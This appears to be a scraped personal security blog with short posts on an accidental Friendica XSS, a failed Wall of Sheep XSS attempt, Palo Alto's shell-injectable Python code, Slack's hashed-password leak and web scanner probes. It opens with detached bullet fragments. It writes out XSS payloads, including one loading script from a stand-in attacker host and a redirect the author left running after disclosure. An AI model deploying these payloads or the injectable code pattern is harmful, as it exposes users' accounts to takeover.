infosec
- Defending your AI assets
- Defending your assets from AI
- Defending your assets with AI
- Prompt injection for lolz and cash
- Lacks end-to-end encryption
- An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
- The attack was simple: I changed my username to a bit of valid JavaScript.
- All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
- My little joke was annoying but harmless. A malicious attacker could just as easily change their username to
- The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.
-
Because this is how we do it, OK? It’s fine to enjoy that moment of discovery, but when you find a broken window, you let someone know so they can fix it. You don’t go in. And you never, ever use that knowledge to hurt people. ↩︎
-
Exact quote from the conversation: “You have the ability to do the funniest thing in history!” That’s overselling it, but I appreciated their enthusiasm. ↩︎
- If you’re connected to the right Wi-Fi network and submit credentials in plaintext, they’ll be shown on the wall.
- The process of getting captured credentials on the wall is automated.
- The wall is rendered by a web browser.
- The wall’s software has been around for a while and wasn’t written to be particularly secure. After all, it’s on the attacking end, right?
- No one’s tried this before, so no one’s fixed it before.
- Username:
Me<script ...
- Password:
lol
- Setting this up in advance. Again, Vim over SSH on a phone sucks. I’ll have the fake login working before I leave home.
- Getting there earlier. If the Wall of Sheep is ever going to be automated and rendered in a browser, it’ll be at the opening of DEF CON before anyone’s polluted the waters.
- Using a more common authentication method than HTTP Basic auth, like a typical login form.
- Making the resulting page look like I’d really logged into a legitimate service.
- Bringing a burner device, because putting my own personal device on that specific Wi-Fi network was not the best idea I’ve ever had.
-
I didn’t get anyone’s names, or their permission to describe them. Fake names are all you get. ↩︎
-
I appreciate the irony that I’m complaining about hackers getting stuff to show up on the Wall of Sheep in a post where I’m talking about getting stuff to show up on the Wall of Sheep. The first rule of a good prank, though, is “don’t be a jackass and ruin it for everyone else”. I was going for something that I hoped the Shepherds would find amusing and wasn’t trying to get racial slurs and other vile junk to show up on a big screen. Don’t be that person. ↩︎
- How can you have a major vulnerability like this for 5 years?
- What hashing algorithm did they use? Argon2? MD5?
- Did they use per-user salts or one global one?
- Where is the open, public notification of the issue?
- However good and strong your WiFi password is, if an attacker can access your neighbor’s network, they can hack your neighbor’s Alexa and then use it to gain access to your own wireless network.
- A braver attacker could sit outside your house with a hacked Alexa, or an app on their laptop that acts like one, and use it to connect to your Ring doorbell and then attack the other computers on your network.
The coffee shop is fine
I hear too many acquaintances worry that employees might work from a coffee shop or other public network, putting their whole company at risk. So what if they do? The idea that a coffee shop’s Wi-Fi is insecure implies that there’s a mythical “secure” network that can be trusted with the company’s secrets. That’s almost never true.
Work-from-home employees are on a tame home Wi-Fi setup, right? Don’t count on it. Is their gear current? Are they sharing Wi-Fi with their neighbors? Are they using their apartment building’s network? Who’s their ISP? Although their home setup might – or might not – have fewer people on it than the local cafe’s, that doesn’t make it trustworthy.
What about the employees we coerced into returning to a legacy office and using its Wi-Fi? Oh. You mean that named network that sits around with a target on its back as belonging to important people? Unless you manage your own office, and it’s in a Faraday cage blocking all outbound or inbound radio signals, and you pretend that MAC filtering is a security feature, and all your equipment is patched with the latest security updates, and you have guards walking around with fox hunt antennas to spot rogue access points, it’s not substantially better in the ways that count. If you can read this at work, at least a few of those assumptions are likely wrong.
The idea of a “trusted network” is dead. It’s time we stop pretending. If an employee can be compromised at the coffee shop, they can be compromised at the office. We have to design our defenses as though our staff are working from the free network at DEF CON. That means making sure all employee devices and servers are patched. That all connections are encrypted, even those between internal systems. That authentication uses cryptography, not passwords. That we don’t pretend that “route all traffic” VPNs are a good idea. That we don’t rely on allowlisted IPs as a critical defense. That we don’t trust any network our employees might use, and that our systems are robust enough to endure hostile environments. Yes, even the ones we tell ourselves are safe.
And if we’re not comfortable with our coworkers typing away next to a fresh latte, it’s our responsibility to figure out what part of that bothers us and then fix it. The issues that would make that scenario dangerous affect the “secure” office, too.
The email: Click here to enhance your account’s security with two-factor authentication!
Click.
The website: Please enter your phone number to receive your access code.
Cmd-W.
When a coworker forwards you an email to ask if it looks like phishing, take a moment to publicly praise them for it. “Jane sent me an example of a new phishing campaign going around. Her instinct to let us know about it was exactly right. Thanks, Jane!” Reinforce the idea that Security has their back and will be pleasant to interact with. That’s how you get them to want to report things.
Polyfill supply chain attack hits 100K+ sites:
The
polyfill.js
is a popular open source library to support older browsers. 100K+ sites embed it using thecdn.polyfill.io
domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embedscdn.polyfill.io
.
This is fine.
This is interesting and dangerous. I’m trying the new macOS Sequoia Passwords app. I exported my passwords from 1Password to a CSV and imported them into the new app, then soon saw a bunch of ancient logins from old employers. What? Searching for them in 1Password found nothing.
Oh, turns out those are archived in 1Password. The normal cmd-F search doesn’t look in Archive even if you’ve selected it. The other opt-cmd-F find does.
Hope you remembered to delete the passwords that would get you beaten up.
Little Snitch 6 came out yesterday with many quality of life improvements.
It’s always the first app I install on a new Mac. New versions are no-brainer upgrades for me. I still wish it had a way to sync rulesets between Macs so that I don’t have to train each one independently.
I am not exaggerating this:
I created a new hostname in DNS, then added it to my existing webserver config.
It was online for 3 seconds – 3! – before getting a 404 request for /.git/config
.
If you’re relying on obscurity to protect your services, get that right out your fool head today. You have about 3 seconds to get your act together.
In the time it took me to type this, I got another 62 requests:
30 "/"
3 "/.git/config"
2 "/.vscode/sftp.json"
2 "/v2/_catalog"
2 "/telescope/requests"
2 "/server-status"
2 "/server"
2 "/s/431323e2230323e2134323e2239313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
2 "/?rest_route=/wp/v2/users/"
2 "/login.action"
2 "/.env"
2 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
2 "/.DS_Store"
2 "/debug/default/view?panel=config"
2 "/config.json"
2 "/_all_dbs"
2 "/about"
You know how sometimes you come to decide that an entire niche market is so filled with awful and overpriced alternatives that you’d rather just write your own and give it away for free?
My toes are on the precipice.
Conference tracks where more than a few people are wearing khaki:
Additional conference tracks where more than a few people have primary colored hair:
Palo Alto's exploited Python code
watchTowr Labs has a nice blog post dissecting CVE-2024-3400. It’s very readable. Go check it out.
The awfulness of Palo Alto’s Python code in this snippet stood out to me:
def some_function():
...
if source_ip_str is not None and source_ip_str != "":
curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
%(signedUrl, fname, capath, source_ip_str)
else:
curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
%(signedUrl, fname, capath)
if dbg:
logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
...
def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
"""call shell-command and either return its output or kill it
if it doesn't normally exit within timeout seconds"""
# Define dosys specific constants here
PANSYS_POST_SIGKILL_RETRY_COUNT = 5
# how long to pause between poll-readline-readline cycles
PANSYS_DOSYS_PAUSE = 0.1
# Use first_wait if time to complete is lengthy and can be estimated
if first_wait == None:
first_wait = PANSYS_DOSYS_PAUSE
# restrict the maximum possible dosys timeout
PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
# Can support upto 2GB per stream
out = StringIO()
err = StringIO()
try:
if shell:
cmd = command
else:
cmd = command.split()
except AttributeError: cmd = command
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
It uses string building to create a curl
command line. Then it passes that command line down into a function that calls subprocess.Popen(cmd_line, shell=True)
. What? No! Don’t ever do that!
I fed that code into the open source bandit static analyzer. It flagged this code with a high severity, high confidence finding:
ᐅ bandit pan.py
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.12.1
Run started:2024-04-16 17:14:52.240258
Test results:
>> Issue: [B604:any_other_function_with_shell_equals_true] Function call with shell=True parameter identified, possible security issue.
Severity: Medium Confidence: Low
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b604_any_other_function_with_shell_equals_true.html
Location: ./pan.py:14:26
13 logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
14 stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
15
--------------------------------------------------
>> Issue: [B602:subprocess_popen_with_shell_equals_true] subprocess call with shell=True identified, security issue.
Severity: High Confidence: High
CWE: CWE-78 (https://cwe.mitre.org/data/definitions/78.html)
More Info: https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html
Location: ./pan.py:49:8
48 bufsize=1,
49 shell=shell,
50 stderr=subprocess.PIPE,
51 close_fds=close_fds,
52 universal_newlines=True,
53 )
54 timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)
--------------------------------------------------
Code scanned:
Total lines of code: 41
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 1
High: 1
Total issues (by confidence):
Undefined: 0
Low: 1
Medium: 0
High: 1
Files skipped (0):
From that we can infer that Palo Alto does not use effective static analysis on their Python code. If they did, this code would not have made it to production.
Veilid in The Washington Post
I’ve been helping on a fun project with some incredibly brilliant friends. I found myself talking about it to a reporter at The Washington Post. The story just came out. My part was crucial, insightful, and far, far down the page:
Once known for distributing hacking tools and shaming software companies into improving their security, a famed group of technology activists is now working to develop a system that will allow the creation of messaging and social networking apps that won’t keep hold of users’ personal data. […] “It’s a new way of combining [technologies] to work together,” said Strauser, who is the lead security architect at a digital health company.
You bet I’m letting this go to my head.
At work: “Kirk, I think you’re wrong.” “Well, one of us was featured in WaPo, so we’ll just admit that I’m the expert here.”
At home: “Honey, can you take the trash out?” “People in The Washington Post can’t be expected to just…” “Take this out, ‘please’.”
But really, Veilid is incredibly neat and I’m awed by the people I’ve been lucky to work with. Check it out after the launch next week at DEF CON 31.
I use Things without encryption
Update 2023-11-03: No, I don’t.
I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:
I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:
I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.
I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)
Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.
Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.
While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.
Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.
But I know I should still look for something more secure.
Accidentally Hacking the Planet
Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:
<script type="text/javascript">alert("I was here.");</script>
Because I’m kind of a smartass, I later changed my Mastodon username to something similar:
<script>alert("Tek");</script>
Then I laughed about it with my geeky friends and promptly forgot all about the joke.
And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script>
tag instead of displaying it as the literal text <script>alert("Tek");</script>
. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.
<script src="https://hackerz.ru/badstuff.js">Hi</script>
That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.1 Satisfied that the right people had been notified, I went back to bed.
The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”2
My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:
<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>
It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.
I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.
To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.
It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.
The Internet is a rough neighborhood
This week I stood up a new firewall in front of my home network. This one has much better logging than the old one, and I’ve been watching the block reports.
Real talk, friends: DO. NOT. expose a machine to the open Internet unless you’re 100% confident it’s bulletproof.
“I run my service on a custom port!” Doesn’t matter.
“I use IPv6!” Doesn’t matter.
“I’m just a nobody!” Doesn’t matter.
Practice safer networking, every time, all the time.
Trying (and Failing) to hack the Wall of Sheep
The Wall of Sheep is a popular exhibit at DEF CON. Participants run packet sniffers on an insecure Wi-Fi network and try to catch people logging into unencrypted websites and other services. If they see that happening, they post the person’s username and password on a giant display. It looks something like:
That’s an excellent reminder to be careful when you’re connected to an unknown network, and not to send your login credentials out in the open.
From the first time I saw it, though, I had to wonder: is the wall itself hackable? Could I make it look like this instead?
The idea kept bouncing around the back of my mind until I added it to my to-do list so I could stop thinking about it. I had to at least try it.
Assumptions
I know nothing about the Wall of Sheep’s internal workings. That’s deliberate. I wanted to test this for the fun of it, and part of the challenge was to see how far I could get without any knowledge of it. I had to make a few assumptions:
Choosing the attack
If the above assumptions are true, the obvious attack vector is Cross Site Scripting (XSS). The method is to create a snippet of JavaScript and then trick the Wall of Sheep into displaying — and executing — it. This should work:
<script type="text/javascript">alert("I was here.");</script>
But how do I get that onto the board? The password field is usually censored, such as hunter2
being masked to hunt***
. That would destroy the payload, so that wouldn’t work. Is there a way to make a DNS hostname that renders correctly? Eh, maybe, but crafting that sounds like work. (Note to self: but boy, wouldn’t that wreak havoc on the web? Huh. I’ve gotta look into that.)
However, look at that lovely login field. It’s just sitting out there in full, uncensored, plaintext glory. Jackpot! That’s where I’ll inject the JavaScript.
Setting up a webserver
This attack requires a webserver to send those faked credentials to. For ease of implementation, I configured HTTP Basic authentication with:
Getting onto the DefCon-open Wi-Fi
You brought a burner device, right? I didn’t. What could possibly go wrong connecting an off-the-shelf device to an open network at DEF CON! YOLO.
Visiting the web page
I logged into the page on my webserver’s bare IP address, watched the board, and… nothing. I reloaded it; nothing. I looked around to see if any of the participants looked like they might’ve found something; still nothing. Rats.
Enlisting help
Jan and Pat1 were participants sitting near where I was setting this up. I needed their assistance but didn’t want to outright ask for it. I started posing innocent questions to Jan: “Hey, what are you working on? What’s Wireshark?” While they kindly explained in general terms, they were understandably more interested in their own project than tutoring a passerby. Pat was more willing to teach me and I pulled up a chair to sit with them. They patiently answered my questions and pointed to interesting things on their screen. They also noticed fairly quickly that I was regularly reloading a page on my phone as I watched them. “Hey, uh, are you trying to get caught?” “Maaaaybe…” “Why?” I gave them a quick explanation of my project and they instantly bought in:
Pat: Do you think this’ll work?
Me: Probably not, but it’s worth a shot.
Pat: Oh, wow. If it does, this will be legendary!
I had a helper. Soon after, Jan noticed we were up to something, leading to one of my favorite exchanges at DEF CON:
Jan: Are you two trying to get something up there on the board?
Me, grinning: Yeah. It’s a JavaScript injection.
Jan, wide-eyed: Who the hell are you?
Thank you, Jan. I felt like a bona fide Security Researcher after that.
Another random visitor saw us huddled and asked if we were trying to hack something. Jan looked at me, looked at the visitor, said “nope”, and looked back at me. I winked at Jan. Jan nodded back. The visitor squinted at us and walked off. Jan had my back.
Social engineering a Shepherd
After experimentation, we had usable Wireshark captures of me logging into my website. However, they weren’t being displayed on the Wall of Sheep. It turned out that my assumption was wrong: we had to demonstrate the capture to a “Shepherd” running the contest. Pat called one over. We showed them Pat’s capture, but they weren’t convinced at first. Most website logins are through a form POSTed to the server, not through HTTP Basic authentication. The Shepherd was also skeptical that the login was successful because the server was returning the default “welcome to Nginx!” page and not something personalized for the (obviously fake) username. I leaned very hard into the “innocent observer” role, asking questions like “but isn’t that what a successful capture looks like?” and “golly gee, it looks right to me. Don’t you think?” and “it looks suspicious to me, too, but couldn’t we try it and see what happens?” Our Shepherd seemed almost ready to go along with it — until they burned my plan to the ground.
Defeat
I asked the Shepherd how a login goes from being captured to being shown on the Wall of Sheep. Their reply doomed our fun: “I’d type it in.” Oh no. That’s not good. “Isn’t it automatic?”, I asked. The Shepherd paused to rub the bridge of their nose. “Well,” they sighed, “it was until people started sending a bunch of vile usernames and passwords and kind of ruined it2, so now we have to moderate the process.” I wasn’t giving up, though. “Could you type that username to see what happens?” “It’d just show up like that,” they replied. “Could we try it?”, I pleaded. “I mean, it’s just text. Um, that’s not a web page”, they countered.
What.
And then for the first time ever, I saw a flashing cursor down in the bottom corner of the Wall of Sheep. My heart sunk. “Is that Excel or something?” They grinned: “it’s just some old software we run.”
Disaster.
Regrouping
That’s when I formally gave up on this attempt. If it were ever possible to hack the Wall of Sheep, it wasn’t on that day. That doesn’t mean I’m abandoning this forever, though. Next year, I’m going to make a smarter effort, by:
And if Jan and Pat are around, I’m recruiting their help again.
Slack was broadcasting hashed passwords for 5 years
I received an email from Slack on Thursday, 2022-08-04:
We’re writing to let you know about a bug we recently discovered and fixed in Slack’s Shared Invite Link functionality. This feature allows users with the proper permissions to create a link that will allow anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because one or more members of your workspace created and/or revoked one of these links for your workspace between April 17th, 2017 and July 17th, 2022. We’ll go into detail about this security issue below.
Important things first, though: We have no reason to believe that anyone was able to obtain plaintext passwords for users in your workspace because of this vulnerability. However, for the sake of caution, we have reset impacted users’ Slack passwords. They will need to set a new Slack password before they can login again. A list of impacted users is below.
[redacted]
Now, for some technical details — feel free to skip the next two paragraphs if that doesn’t interest you. When you’re connected to Slack, we keep your client updated using a piece of technology called a websocket. This is an always-open stream of behind-the-scenes information, specific to just you and your account, that we use to push new information to your Slack client. When a new message is posted, a new file is uploaded, a new emoji reaction is added, or a new teammate joins, all of this information (plus much more!) is sent to you over a websocket. Data streamed from Slack’s servers over the websocket is processed by the Slack client apps, but often hidden from the user’s view.
One of the hidden events we send over the websocket is a notice that a shared invite link was created or revoked. The bug we discovered was in this invite link event: along with the information about the shared invite link, we included the hashed password of the user who created or revoked the link. This information was sent over the websocket to all users of the workspace who were currently connected to Slack. The hash of a password is not the same as the password itself; it is a cryptographic technique to store data in a way that is secure, but not reversible. In other words, it is practically infeasible for your password to be derived from the hash, and no one can use the hash to log in as you. We use a technique called salting to further protect these hashes. Hashed passwords are secure, but not perfect — they are still subject to being reversed via brute force — which is why we’ve chosen to reset the passwords of everyone affected.
When your users reset their passwords we recommend selecting a complex and unique password. This is easiest to do by using a password manager to help generate and store strong, unique passwords for every service.
If you have additional questions, or if you need our help as you investigate this issue, you can reply to this message or email us feedback@slack.com.
We know that the security of your data is important. We deeply regret this issue and its impact on your organization.
Sincerely, The team at Slack
In summary, for 5 years Slack sent your hashed password to everyone on your Slack server every time you invited (or uninvited) someone to it.
This email leaves a few questions unanswered:
However, they did get one thing right: use a password manager to generate a strong, random password for every single service you use, and never, ever, under any circumstances, use the same password for more than one service. Because if you’ve invited anyone to Slack in the last 5 years, and you use the same password for Slack and your bank, I hope you’re on friendly terms with all of your coworkers.
Update 2022-08-06
Slack has now posted about this on their blog.
Do not use Readdle's Spark email app
I’ve written before about Readdle’s Spark email client, which is popular, highly rated, and a beautifully powerful app. It’s also too dangerous to use. I recommend dropping it immediately.
Readdle is a good, reputable company. I respect and appreciate them. However, Spark’s design is fatally flawed: to use its advanced features, your email username and password (or token — same thing) have to be stored on their servers so that they can access your email account on your behalf. That’s bad under normal circumstances, but astoundingly risky today. Readdle was founded in Ukraine and still has many Ukrainian employees. Russia is currently invading Ukraine, a sovereign country. If Russia manages to do this, they could likely have access to the login credentials of every one of Spark’s users. This would be catastrophic. Imagine Russia’s security agencies having full access to your work account, being able to use your personal email to reset your banking website’s password, or reading every email you’ve ever sent or received.
Spark isn’t the only email app designed this way. I believe it’s the most popular, though, and that means its dangerous-by-design architecture is used by a lot of people. This isn’t acceptable and it can’t be fixed. If you use Spark, I strongly recommend following their instructions to delete all your data off their servers immediately, and then changing the password of every account you’d used it with.
And when you’re done, see if their other apps look interesting to you. Risks with Spark aside, Readdle makes delightful software and could use our support right now.
Uniquely bad identity branding
My company has an account with a certain identity provider so we can test that our single sign-on feature works. Today one of my coworkers asked for an account with the IdP before he started working on that part of our code. I tried to create his user but got an error that the “username must be unique”. Huh. I double-checked our user list to ensure we didn’t have an account for him. We didn’t. I tried again and got the same error. That’s when I reached out to their support. They quickly replied:
To resolve this issue, please navigate to Administration > Settings > Branding and toggle the custom branding switch to green. Then try to create a user and it should allow you!
What. This had nothing to do with branding, and the switch in question looks like this:
But alright, I figured I’d try their suggestion.
It worked.
I supposed what likely happened was that support quickly found and fixed and issue, then gave me a switch to flip to make it feel like I was fixing something. I replied to them:
So we couldn’t add that user (but could add other users) because we didn’t have custom branding enabled? That can’t be right.
Their response?
It could be possible that the same username could exist in another customer’s tenant. So, once you enable the custom branding it would only look for your tenant for a unique username. With branding currently being disabled, the system is considering all tenants.
In short, if you click a logo to use your own theme for their site, usernames only have to be unique within your organization. If you don’t customize the site’s theme, they have to be unique across the whole identity provider. Furthermore, that uniqueness check only happens when you create a new user. If you flip the branding/namespace switch on, create an account, then flip the switch back off, the account is still active and usable even though it’s not globally unique. Even if you think that tying branding to uniqueness is a good idea — and it’s not — it doesn’t even work.
That whole setup is nuts.
Tripping on a Cracked Sidewalk
Amazon Sidewalk is a new project which allows Amazon devices (like Alexa, Ring doorbells, etc.) with different owners to share their Internet connections. In short, your Alexa talks to your neighbor’s Alexa. If your Internet connection goes down, your neighbor’s device will relay messages for your device so that it can keep working. Similarly, if your Ring doorbell is closer to your neighbor’s Alexa than to your own WiFi router, it can send alerts to you through their Alexa.
This is a terrible idea.
This means that a device on your home network — a device you bought and paid for yourself — is letting other devices you don’t control borrow your Internet connection. Amazon claims to have designed this as a secure system, but people in infosec know that a new security protocol written and implemented by a single company is going to be a mess. When (not if, but when) an attacker finds a flaw in the Sidewalk protocol or the devices it runs on, 2 terrible scenarios seem likely to happen:
If you have any Amazon devices, I strongly recommend you follow their instructions to turn off Sidewalk immediately. Because Amazon plans to turn this on for everyone who hasn’t explicitly asked them not to, if you don’t follow those instructions, you’ll be allowing people near your home to use your WiFi. Some owners have claimed that they turned off Sidewalk but that it turned itself back on after a software update. If this happens in my home, I will literally throw our Alexas out in the trash.
Amazon Sidewalk is a solution without a problem. Turn it off. This is a potential disaster in the making.
Security training for the masses
My company is going through its annual HIPAA privacy and security refresher training. This is a good thing and I wholeheartedly support it, as it’s always nice to be reminded of some of the details. “Oh, I forgot that we’re allowed to do X! That’s good to know.”
But the most irksome thing in the world is when you know the right answer to a test question but are required to give the wrong one to pass it. For instance, we were asked:
If you then connect with a VPN, will that ensure a file sent via email will be secure all the way through to its destination? Yes / No / Maybe
Test says: maybe! If you change nothing about your setup except adding a VPN into the mix, you may now be able to send email securely.
I say: The correct answer is “of course not”. Our company uses a “split tunnel” VPN so that only connections to certain services go over the VPN but the rest of our traffic goes over the open Internet? Do we need to route someone’s after-hours Netflix viewing through an encrypted connection? No thank you. But even without that, once you send an email to your own server, you have no control over what happens next. Does the recipient’s server support TLS connections? Are emails stored on that server encrypted at rest? Does their email app require TLS? Who knows! You sure won’t. So no, a VPN absolutely does not guarantee an email will be secure all the way through to its destination.
If you encrypt the file you are emailing, will that ensure a file sent via email will be secure all the way through to its destination?
Test says: yes! If you encrypt an email to an employee at another company, it’s guaranteed to be secure.
I say: Maybe, sure. I’d even go so far as saying it probably will. However, for all I know the recipient’s company uses some key escrow thing that lets them decrypt and analyze all inbound mail, and Joe from IT occasionally sells the interesting ones to North Korea.
Thing is, our particular training program is for the most part pretty decent, as far as such things go. Again, I’m glad we’re doing it. I just wish their post-training exams were a little more carefully worded.